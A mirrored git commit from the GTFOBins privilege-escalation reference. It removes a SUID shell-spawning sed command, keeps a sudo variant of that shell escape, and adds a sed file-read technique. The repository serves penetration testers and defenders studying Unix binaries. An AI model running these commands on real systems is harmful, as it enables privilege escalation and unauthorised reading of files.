mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-24 22:09:35 +01:00
Remove invalid SUID execute from sed
This commit is contained in:
parent
2da69686ac
commit
b3fc53a9d3
@ -10,8 +10,9 @@ functions:
|
||||
- description: GNU version only. Also, this requires `bash`.
|
||||
code: sudo sed -n "1e /bin/bash -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh -i'" /etc/hosts
|
||||
suid-enabled:
|
||||
- description: GNU version only. Also, this requires `bash`.
|
||||
code: ./sed -n "1e /bin/bash -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh -i'" /etc/hosts
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
./sed -e '' "$LFILE"
|
||||
file-read:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
|
Loading…
Reference in New Issue
Block a user